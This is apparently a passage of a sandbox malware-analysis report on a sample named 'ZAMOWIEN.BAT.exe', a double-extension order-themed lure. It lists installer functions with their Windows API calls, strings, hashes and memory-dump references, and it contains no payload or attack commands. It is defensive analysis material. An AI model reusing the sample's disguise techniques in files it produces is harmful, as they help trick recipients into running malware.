Associated: 00000000.00000002.2060951718.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.00000000007AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2061326942.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 6d7a4653c2c578a8d5284db4295a5fca007dcf3c6f2789ed20d5a7e0b642a0a4
Instruction ID: 1f0fa0d2247511df27580cb3caba4c56f286309e0a9037e8990667680d6ae8bf
Opcode Fuzzy Hash: 6d7a4653c2c578a8d5284db4295a5fca007dcf3c6f2789ed20d5a7e0b642a0a4
Instruction Fuzzy Hash: D0C04C71744600AAEA109B609E45F07776467D1B01F1489297240E50E0D679E450DA1C

Function 00403603 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(?,00000000,00000000,00403301,?), ref: 00403611

Memory Dump Source

Source File: 00000000.00000002.2060912923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2060898572.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060931678.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.00000000007AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2061326942.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
Instruction ID: 1f5c7ae16c2334422adcad36111bde95194575cbdac9b1f52e29a9f6e91cc98e
Opcode Fuzzy Hash: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
Instruction Fuzzy Hash: 34B01271240300BFDA214F00DF09F057B21ABA0700F10C034B388380F086711035EB0D

Function 0040463C Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000028,?,?,00404467), ref: 0040464A

Memory Dump Source

Source File: 00000000.00000002.2060912923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2060898572.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060931678.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.00000000007AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2061326942.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: e9c4bd98294b0e05cec7a80d31a0a76723ba02a2360da9c14e8ba5eddd12b981
Instruction ID: 80f62bd17d7f8ac79c475e35235d6e21c5e8bc2a0d4b48d8f994a5c5f8af4436
Opcode Fuzzy Hash: e9c4bd98294b0e05cec7a80d31a0a76723ba02a2360da9c14e8ba5eddd12b981
Instruction Fuzzy Hash: 4BB09235181A00BADA515B00DE09F46BB62ABA4701F008528B240680F0CAB200A0DB09

Function 00404629 Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,00404400), ref: 00404633

Memory Dump Source

Source File: 00000000.00000002.2060912923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2060898572.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060931678.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.00000000007AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2061326942.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 6f245bf96e23fac7bc6c618164a6406fbfa451b615f541c643cd93c68d609665
Instruction ID: 2bb5904b561859077d2e14bf17e8616c96b7e35b56e2a7e99b4d6fb7f9d4760d
Opcode Fuzzy Hash: 6f245bf96e23fac7bc6c618164a6406fbfa451b615f541c643cd93c68d609665
Instruction Fuzzy Hash: 3FA01132000800ABCA02AB20EF0880ABB22FBE0302B008828A282000308B320820EB08

Non-executed Functions

Function 004062CE Relevance: 24.6, APIs: 10, Strings: 4, Instructions: 130memorystringCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(00000000,?,00000000,?,?,00000000,?,?,00406469,?,?), ref: 00406309
GetShortPathNameW.KERNEL32(?,007A4E28,00000400), ref: 00406312

Part of subcall function 004060DD: lstrlenA.KERNEL32(?,00000000,00000000,00000000,?,00000000,004063C2,00000000,[Rename],00000000,00000000,00000000), ref: 004060ED
Part of subcall function 004060DD: lstrlenA.KERNEL32(?,?,00000000,004063C2,00000000,[Rename],00000000,00000000,00000000), ref: 0040611F

GetShortPathNameW.KERNEL32(?,007A5628,00000400), ref: 0040632F
wsprintfA.USER32 ref: 0040634D
GetFileSize.KERNEL32(00000000,00000000,007A5628,C0000000,00000004,007A5628,?), ref: 00406388
GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406397
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 004063CF
SetFilePointer.KERNEL32(?,00000000,00000000,00000000,00000000,007A4A28,00000000,-0000000A,0040A5B0,00000000,[Rename],00000000,00000000,00000000), ref: 00406425
GlobalFree.KERNEL32(00000000), ref: 00406436
CloseHandle.KERNEL32(00000000), ref: 0040643D

Part of subcall function 00406178: GetFileAttributesW.KERNELBASE(?,00403118,C:\Users\user\Desktop\ZAMOWIEN.BAT.exe,80000000,00000003), ref: 0040617C
Part of subcall function 00406178: CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 0040619E

Strings

%ls=%ls, xrefs: 00406343
[Rename], xrefs: 004063B7, 004063C9
(Vz, xrefs: 00406324
(Nz, xrefs: 004062F7

Memory Dump Source

Source File: 00000000.00000002.2060912923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2060898572.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060931678.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.00000000007AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2061326942.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
String ID: %ls=%ls$(Nz$(Vz$[Rename]
API String ID: 2171350718-1731141773
Opcode ID: 3357c57cd9792c63d911ae114c9432cadb4444b6c2488056b84af6109ea027cf
Instruction ID: a27f09b66fd920797b7c149302c9692e33d6e9fe9a0c6fb9e3bab823282c53bc
Opcode Fuzzy Hash: 3357c57cd9792c63d911ae114c9432cadb4444b6c2488056b84af6109ea027cf
Instruction Fuzzy Hash: B3315731500315BBD2206B259D49F2B3A6CEF86719F06003EFD02F62D3EA7D982586BD

Function 00406936 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON

Download Yara Rule

APIs

CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\ZAMOWIEN.BAT.exe",74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,00403626,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403935,?,00000008,0000000A,0000000C), ref: 00406999
CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C), ref: 004069A8
CharNextW.USER32(?,"C:\Users\user\Desktop\ZAMOWIEN.BAT.exe",74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,00403626,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403935,?,00000008,0000000A,0000000C), ref: 004069AD
CharPrevW.USER32(?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,00403626,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403935,?,00000008,0000000A,0000000C), ref: 004069C0

Strings

*?|<>/":, xrefs: 00406988
C:\Users\user\AppData\Local\Temp\, xrefs: 00406937
"C:\Users\user\Desktop\ZAMOWIEN.BAT.exe", xrefs: 0040697A

Memory Dump Source

Source File: 00000000.00000002.2060912923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2060898572.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060931678.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.00000000007AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2061326942.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd

Similarity

API ID: Char$Next$Prev
String ID: "C:\Users\user\Desktop\ZAMOWIEN.BAT.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
API String ID: 589700163-2772546769
Opcode ID: 7c4491ab095b24fecdd0000f8ec6f0e383ca7ce11269c465865605e120ff5cd6
Instruction ID: bb20283070e0c209d6802a1910856a96227ff7d3b8efcfb08896c30cca2a309c
Opcode Fuzzy Hash: 7c4491ab095b24fecdd0000f8ec6f0e383ca7ce11269c465865605e120ff5cd6
Instruction Fuzzy Hash: 9411C4A580021399DB303B158D40ABBA6E8AF54750F52403FED8A73AC1E77C4CA282AD

Function 0040466E Relevance: 12.1, APIs: 8, Instructions: 68COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EB), ref: 0040468B
GetSysColor.USER32(00000000), ref: 004046C9
SetTextColor.GDI32(?,00000000), ref: 004046D5
SetBkMode.GDI32(?,?), ref: 004046E1
GetSysColor.USER32(?), ref: 004046F4
SetBkColor.GDI32(?,?), ref: 00404704
DeleteObject.GDI32(?), ref: 0040471E
CreateBrushIndirect.GDI32(?), ref: 00404728

Memory Dump Source

Source File: 00000000.00000002.2060912923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2060898572.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060931678.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.00000000007AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2061326942.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
Instruction ID: a443c49601a32498949eb5b8f53f9e12d43af113c8a35c603a6506417a82097f
Opcode Fuzzy Hash: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
Instruction Fuzzy Hash: 1E2177B1500704ABC730DF78DA48B5B7BF4AF42711B04893DE996A36E0D738E944CB58

Function 6E352480 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 135memoryCOMMON

Download Yara Rule

APIs

GlobalFree.KERNEL32(00000000), ref: 6E3525C2

Part of subcall function 6E3512CC: lstrcpynW.KERNEL32(00000000,?,6E35137F,00000019,6E3511CA,-000000A0), ref: 6E3512DC

GlobalAlloc.KERNEL32(00000040), ref: 6E352548
WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 6E352563

Strings

@Hmu, xrefs: 6E35257C

Memory Dump Source

Source File: 00000000.00000002.2093089192.000000006E351000.00000020.00000001.01000000.00000006.sdmp, Offset: 6E350000, based on PE: true

Associated: 00000000.00000002.2093066982.000000006E350000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.2093101356.000000006E354000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.2093112847.000000006E356000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e350000_ZAMOWIEN.jbxd

Similarity

API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
String ID: @Hmu
API String ID: 4216380887-887474944
Opcode ID: 150f1185f7b09b868ea09a56beb73a78ffdcd1291e1467fdcf7a0dbb8cb8caea
Instruction ID: f22cedfc1958fd73a7ee338baa4461416d9e3e8f0846dfa4340ef705f4408981
Opcode Fuzzy Hash: 150f1185f7b09b868ea09a56beb73a78ffdcd1291e1467fdcf7a0dbb8cb8caea
Instruction Fuzzy Hash: 5C41AAB0008705EFDB149FA9D990E66B7BCFB45314F204D5DE48687380EB31A569CBB1

Function 00403033 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000,00000000), ref: 0040304E
GetTickCount.KERNEL32 ref: 0040306C
wsprintfW.USER32 ref: 0040309A

Part of subcall function 0040570D: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nssF88.tmp\System.dll,00000000,00000000,00000000), ref: 00405745
Part of subcall function 0040570D: lstrlenW.KERNEL32(?,Skipped: C:\Users\user\AppData\Local\Temp\nssF88.tmp\System.dll,00000000,00000000,00000000), ref: 00405755
Part of subcall function 0040570D: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nssF88.tmp\System.dll,?,?,Skipped: C:\Users\user\AppData\Local\Temp\nssF88.tmp\System.dll,00000000,00000000,00000000), ref: 00405768
Part of subcall function 0040570D: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nssF88.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nssF88.tmp\System.dll), ref: 0040577A
Part of subcall function 0040570D: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004057A0
Part of subcall function 0040570D: SendMessageW.USER32(?,0000104D,00000000,?), ref: 004057BA
Part of subcall function 0040570D: SendMessageW.USER32(?,00001013,?,00000000), ref: 004057C8

CreateDialogParamW.USER32(0000006F,00000000,00402F98,00000000), ref: 004030BE
ShowWindow.USER32(00000000,00000005), ref: 004030CC

Part of subcall function 00403017: MulDiv.KERNEL32(00080000,00000064,0001B2D9), ref: 0040302C

Strings

... %d%%, xrefs: 00403094

Memory Dump Source

Source File: 00000000.00000002.2060912923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2060898572.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060931678.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.00000000007AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2061326942.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd

Similarity

API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
String ID: ... %d%%
API String ID: 722711167-2449383134
Opcode ID: e4596b53cd7fb5e771a9310aeb1d3daaf7ca364d2b1208b0680ff29771529a8d
Instruction ID: d8bcacbd7d2f0da6b2c8e47fbee56b79f045e9440a200938cb00b7756d8f7bcc
Opcode Fuzzy Hash: e4596b53cd7fb5e771a9310aeb1d3daaf7ca364d2b1208b0680ff29771529a8d
Instruction Fuzzy Hash: 0401A130502710EBC721AFA0AD48AAB7FACEB05706B14843BF441F11E8DA7C95558B9E

Function 00402F98 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,?,000000FA,00000000), ref: 00402FB6
wsprintfW.USER32 ref: 00402FEA
SetWindowTextW.USER32(?,?), ref: 00402FFA
SetDlgItemTextW.USER32(?,00000406,?), ref: 0040300C

Strings

unpacking data: %d%%, xrefs: 00402FD8, 00402FE8
verifying installer: %d%%, xrefs: 00402FDF

Memory Dump Source

Source File: 00000000.00000002.2060912923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2060898572.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060931678.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.00000000007AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2061326942.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: unpacking data: %d%%$verifying installer: %d%%
API String ID: 1451636040-1158693248
Opcode ID: 30a33e51ebb0687de2ab0f9de2b583d40bf8de1aa61be0624cc62e3c661608a6
Instruction ID: 35e0aa1bc14fc6f8dda882b0f095216f70f1679eddb38f3e3cab602ea1177d7e
Opcode Fuzzy Hash: 30a33e51ebb0687de2ab0f9de2b583d40bf8de1aa61be0624cc62e3c661608a6
Instruction Fuzzy Hash: 58F0317054020CABEF259F60DD4ABEE3B68FB44349F00C03AF605B51D0DBB99A559B99

Function 6E352655 Relevance: 9.1, APIs: 6, Instructions: 109COMMON

Download Yara Rule

APIs

Part of subcall function 6E3512BB: GlobalAlloc.KERNEL32(00000040,?,6E3512DB,?,6E35137F,00000019,6E3511CA,-000000A0), ref: 6E3512C5

GlobalFree.KERNEL32(?), ref: 6E352743
GlobalFree.KERNEL32(00000000), ref: 6E352778

Memory Dump Source

Source File: 00000000.00000002.2093089192.000000006E351000.00000020.00000001.01000000.00000006.sdmp, Offset: 6E350000, based on PE: true

Associated: 00000000.00000002.2093066982.000000006E350000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.2093101356.000000006E354000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.2093112847.000000006E356000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e350000_ZAMOWIEN.jbxd

Similarity

API ID: Global$Free$Alloc
String ID:
API String ID: 1780285237-0
Opcode ID: a47a6ed7ca3e042f860f9b982fc47037799f3a620311c0094aefb31b79e01e56
Instruction ID: 1193fc30a9fc470097b13f593200d492412306f03de2b8961491804e6618cb10
Opcode Fuzzy Hash: a47a6ed7ca3e042f860f9b982fc47037799f3a620311c0094aefb31b79e01e56
Instruction Fuzzy Hash: 6931AD71604A01EFCB19CFA4CAD4C6AB7BEFB86354724496DF14193321D732A826DBA1

Function 6E351979 Relevance: 7.7, APIs: 5, Instructions: 194COMMON

Download Yara Rule

APIs

GlobalFree.KERNEL32(?), ref: 6E3519DA
GlobalFree.KERNEL32(?), ref: 6E351B7A
GlobalFree.KERNEL32(?), ref: 6E351B7F

Memory Dump Source

Source File: 00000000.00000002.2093089192.000000006E351000.00000020.00000001.01000000.00000006.sdmp, Offset: 6E350000, based on PE: true

Associated: 00000000.00000002.2093066982.000000006E350000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.2093101356.000000006E354000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.2093112847.000000006E356000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e350000_ZAMOWIEN.jbxd

Similarity

API ID: FreeGlobal
String ID:
API String ID: 2979337801-0
Opcode ID: 68c29993daeb2e02daebe8d8575713380c179aa0bf1edb6d47dd807b8d417938
Instruction ID: 2af76e34b4ada95612c6b13c160f0214588eb4cef2ad33a75fc50eb734162380
Opcode Fuzzy Hash: 68c29993daeb2e02daebe8d8575713380c179aa0bf1edb6d47dd807b8d417938
Instruction Fuzzy Hash: 51510332D14D09AECB519FE9C840DAEBBBDEB45304F12855AD410A3318F772AA7D87A1

Function 6E3516BD Relevance: 7.5, APIs: 5, Instructions: 41memorylibraryloaderCOMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,6E3522D8,?,00000808), ref: 6E3516D5
GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,6E3522D8,?,00000808), ref: 6E3516DC
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,6E3522D8,?,00000808), ref: 6E3516F0
GetProcAddress.KERNEL32(6E3522D8,00000000), ref: 6E3516F7
GlobalFree.KERNEL32(00000000), ref: 6E351700

Memory Dump Source

Source File: 00000000.00000002.2093089192.000000006E351000.00000020.00000001.01000000.00000006.sdmp, Offset: 6E350000, based on PE: true

Associated: 00000000.00000002.2093066982.000000006E350000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.2093101356.000000006E354000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.2093112847.000000006E356000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e350000_ZAMOWIEN.jbxd

Similarity

API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
String ID:
API String ID: 1148316912-0
Opcode ID: c07d59605a65b2c75d645d55cc0fe62702679d77f35422937bfb0cf6644771ae
Instruction ID: 8a35dc26c1d9ca76e71b81c7b5fa1f4d4a2cd8929bd5618ed4266af11dac5c06
Opcode Fuzzy Hash: c07d59605a65b2c75d645d55cc0fe62702679d77f35422937bfb0cf6644771ae
Instruction Fuzzy Hash: C9F030722066387FDA2016A79C4CCABBF9CEF8B2F5B210355F729D229086614C12D7F1

Function 00405F57 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

